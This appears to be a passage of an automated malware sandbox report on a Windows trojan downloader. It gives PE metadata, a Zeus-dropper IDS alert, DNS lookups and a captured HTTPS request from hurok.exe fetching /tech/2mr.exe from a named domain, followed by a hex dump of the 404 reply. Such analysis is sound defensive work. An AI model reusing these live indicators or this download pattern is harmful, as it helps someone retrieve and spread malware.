.rdata	0x4000	0xdb0	0xe00	False	0.6283482142857143	data	5.715956051080158	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x5000	0x5f0	0x200	False	0.90625	data	5.902942619937564	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x6000	0x2b98	0x2c00	False	0.2313565340909091	data	5.603034121799216	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x6448	0x2734	Device independent bitmap graphic, 49 x 98 x 32, image size 9996	English	United States
RT_GROUP_ICON	0x8b80	0x14	data	English	United States
RT_VERSION	0x6150	0x198	OpenPGP Public Key	English	United States
RT_MANIFEST	0x62e8	0x15a	ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
user32.dll	BeginPaint, DispatchMessageA, DrawTextA, EndPaint, TranslateMessage, GetMessageA, PostQuitMessage, ShowWindow, UpdateWindow, MoveWindow, CreateWindowExA, RegisterClassExA, DefWindowProcA, MessageBoxA, SendMessageA, LoadIconA, DestroyWindow, LoadCursorA, GetClientRect, GetWindowRect
kernel32.dll	GetLastError, lstrcpyA, GetModuleHandleA, GetCommandLineA, DeleteFileA, CloseHandle, CreateFileA
gdi32.dll	DeleteObject, CreateFontIndirectA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.4192.185.35.56496964432017726 02/17/23-06:19:57.094300	TCP	2017726	ET TROJAN Downloader (P2P Zeus dropper UA)	49696	443	192.168.2.4	192.185.35.56

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 17, 2023 06:19:56.514451027 CET	49696	443	192.168.2.4	192.185.35.56
Feb 17, 2023 06:19:56.514530897 CET	443	49696	192.185.35.56	192.168.2.4
Feb 17, 2023 06:19:56.514655113 CET	49696	443	192.168.2.4	192.185.35.56
Feb 17, 2023 06:19:56.534526110 CET	49696	443	192.168.2.4	192.185.35.56
Feb 17, 2023 06:19:56.534570932 CET	443	49696	192.185.35.56	192.168.2.4
Feb 17, 2023 06:19:56.828711033 CET	443	49696	192.185.35.56	192.168.2.4
Feb 17, 2023 06:19:56.828871012 CET	49696	443	192.168.2.4	192.185.35.56
Feb 17, 2023 06:19:57.090924025 CET	49696	443	192.168.2.4	192.185.35.56
Feb 17, 2023 06:19:57.090972900 CET	443	49696	192.185.35.56	192.168.2.4
Feb 17, 2023 06:19:57.091399908 CET	443	49696	192.185.35.56	192.168.2.4
Feb 17, 2023 06:19:57.091491938 CET	49696	443	192.168.2.4	192.185.35.56
Feb 17, 2023 06:19:57.093961954 CET	49696	443	192.168.2.4	192.185.35.56
Feb 17, 2023 06:19:57.094012022 CET	443	49696	192.185.35.56	192.168.2.4
Feb 17, 2023 06:19:57.411056995 CET	443	49696	192.185.35.56	192.168.2.4
Feb 17, 2023 06:19:57.411098957 CET	443	49696	192.185.35.56	192.168.2.4
Feb 17, 2023 06:19:57.411258936 CET	49696	443	192.168.2.4	192.185.35.56
Feb 17, 2023 06:19:57.411295891 CET	443	49696	192.185.35.56	192.168.2.4
Feb 17, 2023 06:19:57.411349058 CET	49696	443	192.168.2.4	192.185.35.56
Feb 17, 2023 06:19:57.548533916 CET	443	49696	192.185.35.56	192.168.2.4
Feb 17, 2023 06:19:57.548672915 CET	443	49696	192.185.35.56	192.168.2.4
Feb 17, 2023 06:19:57.548880100 CET	49696	443	192.168.2.4	192.185.35.56
Feb 17, 2023 06:19:57.548918009 CET	443	49696	192.185.35.56	192.168.2.4
Feb 17, 2023 06:19:57.549027920 CET	49696	443	192.168.2.4	192.185.35.56
Feb 17, 2023 06:19:57.686292887 CET	443	49696	192.185.35.56	192.168.2.4
Feb 17, 2023 06:19:57.686359882 CET	443	49696	192.185.35.56	192.168.2.4
Feb 17, 2023 06:19:57.686439037 CET	443	49696	192.185.35.56	192.168.2.4
Feb 17, 2023 06:19:57.686474085 CET	49696	443	192.168.2.4	192.185.35.56
Feb 17, 2023 06:19:57.686501026 CET	443	49696	192.185.35.56	192.168.2.4
Feb 17, 2023 06:19:57.686525106 CET	49696	443	192.168.2.4	192.185.35.56
Feb 17, 2023 06:19:57.686548948 CET	443	49696	192.185.35.56	192.168.2.4
Feb 17, 2023 06:19:57.686597109 CET	49696	443	192.168.2.4	192.185.35.56
Feb 17, 2023 06:19:57.686605930 CET	443	49696	192.185.35.56	192.168.2.4
Feb 17, 2023 06:19:57.686641932 CET	443	49696	192.185.35.56	192.168.2.4
Feb 17, 2023 06:19:57.686655045 CET	49696	443	192.168.2.4	192.185.35.56
Feb 17, 2023 06:19:57.686662912 CET	443	49696	192.185.35.56	192.168.2.4
Feb 17, 2023 06:19:57.686682940 CET	443	49696	192.185.35.56	192.168.2.4
Feb 17, 2023 06:19:57.686685085 CET	49696	443	192.168.2.4	192.185.35.56
Feb 17, 2023 06:19:57.686712027 CET	49696	443	192.168.2.4	192.185.35.56
Feb 17, 2023 06:19:57.686719894 CET	443	49696	192.185.35.56	192.168.2.4
Feb 17, 2023 06:19:57.686743975 CET	49696	443	192.168.2.4	192.185.35.56
Feb 17, 2023 06:19:57.686762094 CET	49696	443	192.168.2.4	192.185.35.56
Feb 17, 2023 06:19:57.686769009 CET	443	49696	192.185.35.56	192.168.2.4
Feb 17, 2023 06:19:57.686803102 CET	49696	443	192.168.2.4	192.185.35.56
Feb 17, 2023 06:19:57.824953079 CET	443	49696	192.185.35.56	192.168.2.4
Feb 17, 2023 06:19:57.825031996 CET	443	49696	192.185.35.56	192.168.2.4
Feb 17, 2023 06:19:57.825083971 CET	443	49696	192.185.35.56	192.168.2.4
Feb 17, 2023 06:19:57.825119972 CET	49696	443	192.168.2.4	192.185.35.56
Feb 17, 2023 06:19:57.825140953 CET	443	49696	192.185.35.56	192.168.2.4
Feb 17, 2023 06:19:57.825155020 CET	443	49696	192.185.35.56	192.168.2.4
Feb 17, 2023 06:19:57.825205088 CET	49696	443	192.168.2.4	192.185.35.56
Feb 17, 2023 06:19:57.825246096 CET	49696	443	192.168.2.4	192.185.35.56
Feb 17, 2023 06:19:58.653719902 CET	49696	443	192.168.2.4	192.185.35.56

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 17, 2023 06:19:56.448549032 CET	50911	53	192.168.2.4	8.8.8.8
Feb 17, 2023 06:19:56.468061924 CET	53	50911	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 17, 2023 06:19:56.448549032 CET	192.168.2.4	8.8.8.8	0xcdbe	Standard query (0)	gemlttwi.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Feb 17, 2023 06:19:56.468061924 CET	8.8.8.8	192.168.2.4	0xcdbe	No error (0)	gemlttwi.com		192.185.35.56	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

gemlttwi.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49696	192.185.35.56	443	C:\Users\user\AppData\Local\Temp\hurok.exe

Timestamp	kBytes transferred	Direction	Data
2023-02-17 05:19:57 UTC	0	OUT	GET /tech/2mr.exe HTTP/1.1 Accept: text/, application/ User-Agent: Updates downloader Host: gemlttwi.com Cache-Control: no-cache
2023-02-17 05:19:57 UTC	0	IN	HTTP/1.1 404 Not Found Date: Fri, 17 Feb 2023 05:19:57 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://gemlttwi.com/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade Vary: Accept-Encoding X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-02-17 05:19:57 UTC	0	IN	Data Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 65 6e 65 72 61 6c 20 45 61 72 74 68 20 4d 6f 76 65 72 73 20 4c 69 6d Data Ascii: 4000<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – General Earth Movers Lim
2023-02-17 05:19:57 UTC	8	IN	Data Raw: 74 65 78 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 2e 35 72 65 6d 3b 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 39 32 32 70 78 29 7b 2e 65 72 72 6f 72 34 30 34 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 23 70 72 69 6d 61 72 79 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 34 65 6d 3b 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 39 32 30 70 78 29 7b 2e 61 73 74 2d 34 30 34 2d 6c 61 79 6f 75 74 2d 31 20 2e 61 73 74 2d 34 30 34 2d 74 65 78 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 2e 32 35 72 65 6d 3b 7d 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 2d 77 72 61 70 70 65 72 20 2e 65 6c 65 6d 65 6e 74 6f Data Ascii: text{font-size:200px;font-size:12.5rem;}@media (min-width:922px){.error404.ast-separate-container #primary{margin-bottom:4em;}}@media (max-width:920px){.ast-404-layout-1 .ast-404-text{font-size:100px;font-size:6.25rem;}}.elementor-button-wrapper .elemento
2023-02-17 05:19:57 UTC	16	IN	Data Raw: 0d 0a Data Ascii:
2023-02-17 05:19:57 UTC	16	IN	Data Raw: 34 30 30 30 0d 0a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 65 61 65 61 65 61 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 61 66 61 66 61 3b 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 2d 69 6e 73 69 64 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 73 69 64 65 2d 77 72 61 70 70 65 72 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 70 75 74 3a 66 6f 63 75 73 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 6c 6f 67 69 6e 6f 75 74 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7b 6f 75 74 6c 69 6e 65 3a 20 74 68 69 6e 20 64 6f 74 74 65 64 3b 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6c 6f 67 69 6e 6f 75 74 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7b 62 6f 72 64 65 72 2d 63 6f Data Ascii: 4000border-color: #eaeaea;background: #fafafa;}.wp-block-search.wp-block-search__button-inside .wp-block-search__inside-wrapper .wp-block-search__input:focus,.wp-block-loginout input:focus {outline: thin dotted;}.wp-block-loginout input:focus {border-co
2023-02-17 05:19:57 UTC	24	IN	Data Raw: 67 67 6c 65 7b 74 6f 70 3a 30 3b 7d 2e 61 73 74 2d 62 75 69 6c 64 65 72 2d 6d 65 6e 75 2d 31 20 2e 6d 65 6e 75 2d 69 74 65 6d 2d 68 61 73 2d 63 68 69 6c 64 72 65 6e 20 3e 20 2e 6d 65 6e 75 2d 6c 69 6e 6b 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 75 6e 73 65 74 3b 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 35 34 34 70 78 29 7b 2e 61 73 74 2d 68 65 61 64 65 72 2d 62 72 65 61 6b 2d 70 6f 69 6e 74 20 2e 61 73 74 2d 62 75 69 6c 64 65 72 2d 6d 65 6e 75 2d 31 20 2e 6d 65 6e 75 2d 69 74 65 6d 2e 6d 65 6e 75 2d 69 74 65 6d 2d 68 61 73 2d 63 68 69 6c 64 72 65 6e 20 3e 20 2e 61 73 74 2d 6d 65 6e 75 2d 74 6f 67 67 6c 65 7b 74 6f 70 3a 30 3b 7d 7d 2e 61 73 74 2d 62 75 69 6c 64 65 72 2d 6d 65 6e 75 2d 31 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 7d Data Ascii: ggle{top:0;}.ast-builder-menu-1 .menu-item-has-children > .menu-link:after{content:unset;}}@media (max-width:544px){.ast-header-break-point .ast-builder-menu-1 .menu-item.menu-item-has-children > .ast-menu-toggle{top:0;}}.ast-builder-menu-1{display:flex;}
2023-02-17 05:19:57 UTC	32	IN	Data Raw: 0d 0a Data Ascii:
2023-02-17 05:19:57 UTC	32	IN	Data Raw: 34 30 30 30 0d 0a 6d 61 72 79 2d 66 6f 6f 74 65 72 2d 77 72 61 70 5b 64 61 74 61 2d 73 65 63 74 69 6f 6e 3d 22 73 65 63 74 69 6f 6e 2d 70 72 69 6d 61 72 79 2d 66 6f 6f 74 65 72 2d 62 75 69 6c 64 65 72 22 5d 2e 61 73 74 2d 66 6f 6f 74 65 72 2d 72 6f 77 2d 74 61 62 6c 65 74 2d 69 6e 6c 69 6e 65 20 2e 73 69 74 65 2d 66 6f 6f 74 65 72 2d 73 65 63 74 69 6f 6e 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 3b 7d 2e 73 69 74 65 2d 70 72 69 6d 61 72 79 2d 66 6f 6f 74 65 72 2d 77 72 61 70 5b 64 61 74 61 2d 73 65 63 74 69 6f 6e 3d 22 73 65 63 74 69 6f 6e 2d 70 72 69 6d 61 72 79 2d 66 6f 6f 74 65 72 2d 62 75 69 6c 64 65 72 22 5d 2e 61 73 74 2d 66 6f 6f 74 65 72 2d 72 6f 77 2d 74 61 62 6c 65 74 2d 73 74 61 63 6b 20 2e 73 69 74 Data Ascii: 4000mary-footer-wrap[data-section="section-primary-footer-builder"].ast-footer-row-tablet-inline .site-footer-section{display:flex;margin-bottom:0;}.site-primary-footer-wrap[data-section="section-primary-footer-builder"].ast-footer-row-tablet-stack .sit
2023-02-17 05:19:57 UTC	40	IN	Data Raw: 2d 70 6f 69 6e 74 20 2e 66 6f 6f 74 65 72 2d 77 69 64 67 65 74 2d 61 72 65 61 5b 64 61 74 61 2d 73 65 63 74 69 6f 6e 3d 22 73 69 64 65 62 61 72 2d 77 69 64 67 65 74 73 2d 66 6f 6f 74 65 72 2d 77 69 64 67 65 74 2d 33 22 5d 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 35 34 34 70 78 29 7b 2e 61 73 74 2d 68 65 61 64 65 72 2d 62 72 65 61 6b 2d 70 6f 69 6e 74 20 2e 66 6f 6f 74 65 72 2d 77 69 64 67 65 74 2d 61 72 65 61 5b 64 61 74 61 2d 73 65 63 74 69 6f 6e 3d 22 73 69 64 65 62 61 72 2d 77 69 64 67 65 74 73 2d 66 6f 6f 74 65 72 2d 77 69 64 67 65 74 2d 33 22 5d 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 7d 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 74 65 6d 70 6c 61 74 65 2d 66 75 6c 6c 2d 77 69 64 74 68 20 Data Ascii: -point .footer-widget-area[data-section="sidebar-widgets-footer-widget-3"]{display:block;}}@media (max-width:544px){.ast-header-break-point .footer-widget-area[data-section="sidebar-widgets-footer-widget-3"]{display:block;}}.elementor-template-full-width
2023-02-17 05:19:57 UTC	48	IN	Data Raw: 0d 0a Data Ascii:
2023-02-17 05:19:57 UTC	48	IN	Data Raw: 33 64 61 0d 0a 2d 68 65 61 64 65 72 2d 62 72 65 61 6b 2d 70 6f 69 6e 74 20 2e 61 73 74 2d 70 72 69 6d 61 72 79 2d 68 65 61 64 65 72 2d 62 61 72 7b 64 69 73 70 6c 61 79 3a 67 72 69 64 3b 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 35 34 34 70 78 29 7b 2e 61 73 74 2d 68 65 61 64 65 72 2d 62 72 65 61 6b 2d 70 6f 69 6e 74 20 2e 61 73 74 2d 70 72 69 6d 61 72 79 2d 68 65 61 64 65 72 2d 62 61 72 7b 64 69 73 70 6c 61 79 3a 67 72 69 64 3b 7d 7d 5b 64 61 74 61 2d 73 65 63 74 69 6f 6e 3d 22 73 65 63 74 69 6f 6e 2d 68 65 61 64 65 72 2d 6d 6f 62 69 6c 65 2d 74 72 69 67 67 65 72 22 5d 20 2e 61 73 74 2d 62 75 74 74 6f 6e 2d 77 72 61 70 20 2e 61 73 74 2d 6d 6f 62 69 6c 65 2d 6d 65 6e 75 2d 74 72 69 67 67 65 72 2d 6d 69 6e 69 6d 61 6c 7b 63 6f 6c 6f 72 3a Data Ascii: 3da-header-break-point .ast-primary-header-bar{display:grid;}}@media (max-width:544px){.ast-header-break-point .ast-primary-header-bar{display:grid;}}[data-section="section-header-mobile-trigger"] .ast-button-wrap .ast-mobile-menu-trigger-minimal{color:
2023-02-17 05:19:57 UTC	56	IN	Data Raw: 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 30 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 30 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 31 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 Data Ascii: nd-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-ast-global-color-0-background-color{background-color: var(--wp--preset--color--ast-global-color-0) !important;}.has-ast-global-color-1-background-color{background-color: va
2023-02-17 05:19:57 UTC	61	IN	Data Raw: 0d 0a Data Ascii:
2023-02-17 05:19:57 UTC	61	IN	Data Raw: 32 32 35 38 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 65 6c 65 6d 65 6e 74 6f 72 2d 66 72 6f 6e 74 65 6e 64 2d 6c 65 67 61 63 79 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 67 65 6d 6c 74 74 77 69 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 65 6c 65 6d 65 6e 74 6f 72 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 72 6f 6e 74 65 6e 64 2d 6c 65 67 61 63 79 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 33 2e 31 31 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 65 6c 65 6d 65 6e 74 6f 72 2d 66 72 6f 6e 74 65 6e 64 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 67 65 6d 6c 74 74 77 69 Data Ascii: 2258<link rel='stylesheet' id='elementor-frontend-legacy-css' href='https://gemlttwi.com/wp-content/plugins/elementor/assets/css/frontend-legacy.min.css?ver=3.11.1' media='all' /><link rel='stylesheet' id='elementor-frontend-css' href='https://gemlttwi
2023-02-17 05:19:57 UTC	69	IN	Data Raw: 74 3a 20 2d 39 39 39 39 70 78 3b 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 22 20 3e 3c 64 65 66 73 3e 3c 66 69 6c 74 65 72 20 69 64 3d 22 77 70 2d 64 75 6f 74 6f 6e 65 2d 62 6c 75 65 2d 6f 72 61 6e 67 65 22 3e 3c 66 65 43 6f 6c 6f 72 4d 61 74 72 69 78 20 63 6f 6c 6f 72 2d 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2d 66 69 6c 74 65 72 73 3d 22 73 52 47 42 22 20 74 79 70 65 3d 22 6d 61 74 72 69 78 22 20 76 61 6c 75 65 73 3d 22 20 2e 32 39 39 20 2e 35 38 37 20 2e 31 31 34 20 30 20 30 20 2e 32 39 39 20 2e 35 38 37 20 2e 31 31 34 20 30 20 30 20 2e 32 39 39 20 2e 35 38 37 20 2e 31 31 34 20 30 20 30 20 2e 32 39 39 20 2e 35 38 37 20 2e 31 31 34 20 30 20 30 20 22 20 2f 3e 3c 66 65 43 6f 6d 70 6f 6e 65 6e 74 54 72 61 6e 73 66 65 72 20 63 6f 6c 6f 72 2d 69 Data Ascii: t: -9999px; overflow: hidden;" ><defs><filter id="wp-duotone-blue-orange"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-i
2023-02-17 05:19:57 UTC	70	IN	Data Raw: 0d 0a Data Ascii:
2023-02-17 05:19:57 UTC	70	IN	Data Raw: 32 36 36 32 0d 0a 0d 0a 3c 61 0d 0a 09 63 6c 61 73 73 3d 22 73 6b 69 70 2d 6c 69 6e 6b 20 73 63 72 65 65 6e 2d 72 65 61 64 65 72 2d 74 65 78 74 22 0d 0a 09 68 72 65 66 3d 22 23 63 6f 6e 74 65 6e 74 22 0d 0a 09 72 6f 6c 65 3d 22 6c 69 6e 6b 22 0d 0a 09 74 69 74 6c 65 3d 22 53 6b 69 70 20 74 6f 20 63 6f 6e 74 65 6e 74 22 3e 0d 0a 09 09 53 6b 69 70 20 74 6f 20 63 6f 6e 74 65 6e 74 3c 2f 61 3e 0d 0a 0d 0a 3c 64 69 76 0d 0a 63 6c 61 73 73 3d 22 68 66 65 65 64 20 73 69 74 65 22 20 69 64 3d 22 70 61 67 65 22 3e 0d 0a 09 09 09 3c 68 65 61 64 65 72 0d 0a 09 09 63 6c 61 73 73 3d 22 73 69 74 65 2d 68 65 61 64 65 72 20 68 65 61 64 65 72 2d 6d 61 69 6e 2d 6c 61 79 6f 75 74 2d 31 20 61 73 74 2d 70 72 69 6d 61 72 79 2d 6d 65 6e 75 2d 65 6e 61 62 6c 65 64 20 61 73 74 2d Data Ascii: 2662<aclass="skip-link screen-reader-text"href="#content"role="link"title="Skip to content">Skip to content</a><divclass="hfeed site" id="page"><headerclass="site-header header-main-layout-1 ast-primary-menu-enabled ast-
2023-02-17 05:19:57 UTC	78	IN	Data Raw: 2c 31 30 6c 2d 31 30 2d 31 30 4c 35 37 2e 35 2c 33 38 2e 31 39 33 7a 22 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 76 67 3e 3c 2f 73 70 61 6e 3e 45 71 75 69 70 6d 65 6e 74 20 52 65 6e 74 61 6c 3c 2f 61 3e 3c 2f 6c 69 3e 0a 09 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 32 37 39 34 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 32 37 39 34 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 65 6d 6c 74 74 77 69 2e 63 6f 6d 2f 74 72 61 6e 73 70 6f 72 74 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 6c 69 6e 6b 22 3e 3c 73 70 61 6e 20 63 6c Data Ascii: ,10l-10-10L57.5,38.193z"/> </svg></span>Equipment Rental</a></li><li id="menu-item-2794" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2794"><a href="https://gemlttwi.com/transport/" class="menu-link"><span cl
2023-02-17 05:19:57 UTC	79	IN	Data Raw: 0d 0a Data Ascii:
2023-02-17 05:19:57 UTC	79	IN	Data Raw: 32 62 37 61 0d 0a 3c 2f 64 69 76 3e 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 68 65 61 64 65 72 2d 70 72 69 6d 61 72 79 2d 73 65 63 74 69 6f 6e 2d 72 69 67 68 74 20 73 69 74 65 2d 68 65 61 64 65 72 2d 73 65 63 74 69 6f 6e 20 61 73 74 2d 66 6c 65 78 20 61 73 74 2d 67 72 69 64 2d 72 69 67 68 74 2d 73 65 63 74 69 6f 6e 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 68 65 61 64 65 72 2d 70 72 69 6d 61 72 79 2d 73 65 63 74 69 6f 6e 2d 72 69 67 68 74 2d 63 65 6e 74 65 72 20 73 69 74 65 2d 68 65 61 64 65 72 2d 73 65 63 74 69 6f 6e 20 61 73 74 2d 66 6c 65 78 20 Data Ascii: 2b7a</div></div></div><div class="site-header-primary-section-right site-header-section ast-flex ast-grid-right-section"><div class="site-header-primary-section-right-center site-header-section ast-flex
2023-02-17 05:19:57 UTC	87	IN	Data Raw: 31 39 39 39 2f 78 6c 69 6e 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 77 69 64 74 68 3d 22 32 36 70 78 22 20 68 65 69 67 68 74 3d 22 31 36 2e 30 34 33 70 78 22 20 76 69 65 77 42 6f 78 3d 22 35 37 20 33 35 2e 31 37 31 20 32 36 20 31 36 2e 30 34 33 22 20 65 6e 61 62 6c 65 2d 62 61 63 6b 67 72 6f 75 6e 64 3d 22 6e 65 77 20 35 37 20 33 35 2e 31 37 31 20 32 36 20 31 36 2e 30 34 33 22 20 78 6d 6c 3a 73 70 61 63 65 3d 22 70 72 65 73 65 72 76 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 35 37 2e 35 2c 33 38 2e 31 39 33 6c 31 32 2e 35 2c 31 32 2e 35 6c 31 32 2e 35 2d 31 32 2e 35 6c 2d 32 2e 35 2d 32 2e 35 6c 2d 31 30 2c 31 30 6c 2d 31 30 2d 31 30 4c 35 37 2e 35 2c Data Ascii: 1999/xlink" version="1.1" x="0px" y="0px" width="26px" height="16.043px" viewBox="57 35.171 26 16.043" enable-background="new 57 35.171 26 16.043" xml:space="preserve"> <path d="M57.5,38.193l12.5,12.5l12.5-12.5l-2.5-2.5l-10,10l-10-10L57.5,
2023-02-17 05:19:57 UTC	90	IN	Data Raw: 0d 0a Data Ascii:
